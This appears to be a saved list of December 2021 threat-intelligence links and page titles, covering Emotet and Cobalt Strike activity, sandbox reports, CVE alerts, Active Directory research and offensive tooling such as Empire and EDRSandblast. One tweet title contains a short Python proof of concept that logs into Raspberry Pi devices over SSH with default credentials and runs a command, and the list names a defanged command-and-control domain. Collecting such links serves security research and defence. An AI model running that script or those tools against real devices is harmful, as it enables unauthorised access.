Cryptolaemus on Twitter: "🚨🚨WARNING 🚨🚨 We have confirmed that #Emotet is dropping CS Beacons on E5 Bots and we have observed the following as of 10:00EST/15:00UTC. The following beacon was dropped: https://t.co/imJDQTGqxV Note the traffic to lartmana[.]com. This is an active CS Teams Server. 1/x" / Twitter
https://twitter.com/Cryptolaemus1/status/1468266929014157316
Windows 10 RCE: The exploit is in the link | Positive Security
https://positive.security/blog/ms-officecmd-rce
Triage | Malware sandboxing report by Hatching Triage
https://tria.ge/211208-w82cbaabcm
The hidden side of Seclogon part 2: Abusing leaked handles to dump LSASS memory
https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html
Robo Shadow Alerts on Twitter: "Potentially Critical CVE Detected! CVE-2021-38759 Description: Raspberry Pi OS through 5.10 has the raspberry default password for the pi accou... CVSS: 8.99 #raspberrypi #raspberry_pi_3_model #CVE #CyberSecurity #DataBreach" / Twitter
https://twitter.com/robo_alerts/status/1468339806266662912
GitHub - xforcered/xPipe: Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions
https://github.com/xforcered/xPipe
When old friends meet again: why Emotet chose Trickbot for rebirth - Check Point Research
https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/
Process Ghosting | Pentest Laboratories
https://pentestlaboratories.com/2021/12/08/process-ghosting/
GitHub - wavestone-cdt/EDRSandblast
https://github.com/wavestone-cdt/EdrSandblast
Dave Brown on Twitter: "... https://t.co/HSW2MkSr5n" / Twitter
https://twitter.com/dave_brown24/status/1468396443442552838
GitHub - PwCUK-CTO/ScatterBee_Analysis: Scripts to aid analysis of files obfuscated with ScatterBee.
https://github.com/PwCUK-CTO/ScatterBee_Analysis
Triage | Malware sandboxing report by Hatching Triage
https://tria.ge/211207-t5l24sbean
Class of vulnerabilities in an Active Directory environment – CERT-FR
https://www.cert.ssi.gouv.fr/dur/CERTFR-2021-DUR-001/
Triage | Malware sandboxing report by Hatching Triage
https://tria.ge/211208-z4bgwahdg3/
GitHub - jas502n/Grafana-CVE-2021-43798: Grafana Unauthorized arbitrary file reading vulnerability
https://github.com/jas502n/Grafana-CVE-2021-43798
Diving in to Spooler: Discovering LPE and RCE Vulnerabilities in Windows Printer - YouTube
https://youtu.be/fOUOFGdiNTA
@[email protected] on Twitter: "#POC - CVE-2021-38759 - Tested on latest import paramiko import sys h=sys.argv[1] u="pi" p="raspberry" c=paramiko.client.SSHClient() c.set_missing_host_key_policy(paramiko.AutoAddPolicy()) c.connect(h,username=u,password=p) i,o,e=c.exec_command("id") print(o.read()) c.close()" / Twitter
https://twitter.com/netspooky/status/1468603668266209280
Google Disrupts Blockchain-based Glupteba Botnet; Sues Russian Hackers
https://thehackernews.com/2021/12/google-disrupts-blockchain-based.html
Peeling away the layers of obfuscation from Excel VBA to dll | PC's Xcetra Support
https://pcsxcetrasupport3.wordpress.com/2021/12/07/peeling-away-the-layers-of-obfuscation-from-excel-vba-to-dll/
PSBits/IFilter at master · gtworek/PSBits · GitHub
https://github.com/gtworek/PSBits/tree/master/IFilter
MalwareBazaar | Browse
https://bazaar.abuse.ch/sample/3f13e9bc8011c8bc8f3d7cb9a616ed6da1b6f16d9fcaa65d29d81caf2d5574d3/
Emotet now drops Cobalt Strike, fast forwards ransomware attacks
https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/
Zero-Point Security
https://www.zeropointsecurity.co.uk/red-team-ops/purchase
Warning: Yet Another Bitcoin Mining Malware Targeting QNAP NAS Devices
https://thehackernews.com/2021/12/warning-yet-another-bitcoin-mining.html
SANS Holiday Hack Challenge & KringleCon 2022 | SANS Institute
https://sans.org/holidayhack
FIN13: A Cybercriminal Threat Actor Focused on Mexico | Mandiant
https://www.mandiant.com/resources/fin13-cybercriminal-mexico
GitHub - BC-SECURITY/Empire: Empire is a PowerShell and Python 3.x post-exploitation framework.
https://github.com/BC-SECURITY/Empire
Chinese State-Sponsored Cyber Espionage Activity Supports Expansion of Regional Power and Influence in Southeast Asia
https://www.recordedfuture.com/chinese-state-sponsored-cyber-espionage-expansion-power-influence-southeast-asia/
Leonardo Puglisi on Twitter: "#BREAKING: The Fox News Christmas Tree is on fire in NYC https://t.co/xfWdFgdQIS" / Twitter
https://twitter.com/Leo_Puglisi6/status/1468458890052333568
The Cyber Startup Observatory - The Global Cyber Innovation Network
https://cyberstartupobservatory.com
Hacking the US Government - Legally - GovInfoSecurity
https://www.govinfosecurity.com/hacking-us-government-legally-a-18076
Exploiting Windows COM/WinRT Services - YouTube
https://youtu.be/KeQ0PHrHDVs
InfoSec Handlers Diary Blog - SANS Internet Storm Center
https://i5c.us/d28108
Grafana releases security patch after exploit for severe bug goes public
https://therecord.media/grafana-releases-security-patch-after-exploit-for-severe-bug-goes-public/
Cyber Security Training Events | SANS Institute
https://www.sans.org/u/1hWH
Ringzer0 - WORKSHOPS
https://ringzer0.training/workshops.html
Windows Heap-backed Pool: The Good, the Bad, and the Encoded - YouTube
https://m.youtube.com/watch?v=VvxNc8GTFfk
Moobot botnet spreading via Hikvision camera vulnerability
https://www.bleepingcomputer.com/news/security/moobot-botnet-spreading-via-hikvision-camera-vulnerability/
Resources for Retired Events Links | 6Connex Event Tech
https://securityweek.6connex.com/event/SecuritySummit/en-us#!/Auditorium/n1350713
This Small Tech Company SpiffyTech May Actually Be a Ransomware Front Group
https://www.thedailybeast.com/this-small-tech-company-spiffytech-may-actually-be-a-ransomware-front-group
Malware-Traffic-Analysis.net - 2021-11-30 (Tuesday) - Emotet epoch4 uses appinstaller for infection
https://www.malware-traffic-analysis.net/2021/11/30/index.html